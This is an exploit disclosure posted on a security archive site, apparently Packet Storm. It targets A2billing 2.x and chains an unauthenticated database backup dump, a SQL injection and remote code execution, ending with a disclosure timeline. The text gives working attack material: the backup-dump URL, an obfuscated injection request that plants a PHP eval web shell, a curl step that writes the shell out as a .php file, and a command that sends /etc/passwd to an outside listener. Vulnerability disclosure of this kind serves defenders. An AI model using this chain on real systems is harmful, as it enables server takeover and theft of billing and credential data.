what you don't know can hurt you

A2billing 2.x Backup Disclosure / Code Execution / SQL Injection

A2billing 2.x Backup Disclosure / Code Execution / SQL Injection
Posted Sep 5, 2017
Authored by Ahmed Sultan

A2billing version 2.x suffers from backup disclosure, remote code execution, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, code execution, sql injection, info disclosure
MD5 | 32231b06b60ab43184d0a99f25e0e59c

A2billing 2.x Backup Disclosure / Code Execution / SQL Injection

Change Mirror Download
# Title : A2billing 2.x , Unauthenticated Backup dump / RCE flaw
# Vulnerable software : A2billing 2.x
# Author : Ahmed Sultan (0x4148)
# Email : 0x4148@gmail.com
# Home : 0x4148.com
# Linkedin : https://www.linkedin.com/in/0x4148/

A2billing contain multiple flaws which can be chained together to achieve
shell access over the a2b instance

If you're looking for deep technical stuff , check out the full writeup at
https://0x4148.com/2016/10/28/a2billing-rce/

1 . backup dump
Vulnerable code
File : admin/public/form_data/FG_var_backup.inc
getpost_ifset(array('name','path','creationdate'));

$HD_Form = new FormHandler("cc_backup","Backup");

$HD_Form -> FG_DEBUG = 0;

if ($form_action!='ask-add')
check_demo_mode();

if ($form_action == 'add'){
$backup_file = $path;

if (substr($backup_file,-3)=='.gz'){
// WE NEED TO GZIP
$backup_file = substr($backup_file,0,-3);
$do_gzip=1;
}
// Make the backup stuff here and redirect to success page
//mysqldump -all --databases mya2billing -ua2billinguser
-pa2billing > /tmp/test.sql
//pg_dump -c -d -U a2billinguser -h localhost -f /tmp/test.sql
mya2billing

if (DB_TYPE != 'postgres'){
$run_backup=MYSQLDUMP." -all --databases ".DBNAME." -u'".USER."'
-p'".PASS."' > '{$backup_file}'";
}else{
$env_var="PGPASSWORD='".PASS."'";
putenv($env_var);
$run_backup=PG_DUMP." -c -d -U ".USER." -h ".HOST." -f '{$backup_file}'
".DBNAME;
}
if ($FG_DEBUG == 1 ) echo $run_backup."<br>";
>>>> exec($run_backup,$output,$error);
if ($do_gzip){
// Compress file
$run_gzip = GZIP_EXE." '$backup_file'";
if ($FG_DEBUG == 1 ) echo $run_gzip."<br>";
>>>> exec($run_gzip,$output,$error_zip);
}

File is being called at "admin/Public/A2B_entity_backup.php" before the
authentication checking proccess take place
so to dump full backup we can just move to :
http://HOST//a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.sql
backup will be found at admin/Public/0x4148.sql

few hardening is being carried out by the application which did great job
preventing direct RCE flaw , so we had to figure out sth else

2 . SQL injection
File name : ckeckout_process.php
Line 287 : $Query = "INSERT INTO cc_payments_agent ( agent_id, agent_name,
agent_email_address, item_name, item_id, item_quantity, payment_method,
cc_type, cc_owner, cc_number, " .
" cc_expires, orders_status, last_modified, date_purchased,
orders_date_finished, orders_amount, currency, currency_value) values (" .
" '".$transaction_data[0][1]."', '".$customer_info[3]."
".$customer_info[2]."', '".$customer_info["email"]."', 'balance', '".
$customer_info[0]."', 1, '$pmodule',
'".$_SESSION["p_cardtype"]."', '".$transaction_data[0][5]."',
'".$transaction_data[0][6]."', '".
$transaction_data[0][7]."', $orderStatus, '".$nowDate."',
'".$nowDate."', '".$nowDate."', ".$amount_paid.", '".$currCurrency."', '".
$currencyObject->get_value($currCurrency)."' )";
$result = $DBHandle_max -> Execute($Query);

By exploiting this flaw we can insert malicious data into the db using the
following query <thanks to i-Hmx for the great hint>
transactionID=456789111111 unise//**lecton selinse//**rtect
1,2,3,4,0x706c75676e706179,0x3c3f706870206576616c286261736536345f6465636f646528245f504f53545b6e61696c69745d29293b203f3e,7,8,9,10,11,12,13-//**-
-&sess_id=4148&key=98346a2b29c131c78dc89b50894176eb
After sending this request the following payload "<?php
eval(base64_decode($_POST[nailit])); ?>" will be injected directly into the
DB

3 . RCE
after injecting the malicious code we can just dump backup again but this
time we will name it "0x4148.php" , so our code can be executed :)

[root@localhost Public]# curl '
https://127.0.0.1/a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.php'
--insecure
[root@localhost Public]# cat 0x4148.php | grep nailit
INSERT INTO `cc_payments_agent` VALUES (295,2,'
','','balance','',1,'plugnpay','','66666666666666666666666666666666666666666666','77777777777777777777777777777777','8',-1,'3.000000','2016-10-28
10:57:10','2016-10-28 10:57:10','2016-10-28
10:57:10','usd','0.000000'),(296,2,'
','','balance','',1,'plugnpay','','<?php
eval(base64_decode($_POST[nailit])); ?>','7','8',-1,'3.000000','2016-10-28
10:58:22','2016-10-28 10:58:22','2016-10-28 10:58:22','usd','0.000000');

Now just exploit it via post nailit=base64_encoded php code to
admin/Public/0x4148.php
for instance system(ax=$(cat /etc/passwd);curl -d a$xa
http://x.x.x.x:8000/0x4148.jnka); will read /etc/passwd and send it to our
nc listener

Exploit timeline :
01/10/2016 : vulnerability reported to vendor
06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP
04/09/2017 : Public release

Credits,
Ahmed Sultan - Cyber Security Analyst @ EG-CERT

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    16 Files
  • 17
    Oct 17th
    16 Files
  • 18
    Oct 18th
    15 Files
  • 19
    Oct 19th
    10 Files
  • 20
    Oct 20th
    7 Files
  • 21
    Oct 21st
    4 Files
  • 22
    Oct 22nd
    2 Files
  • 23
    Oct 23rd
    10 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close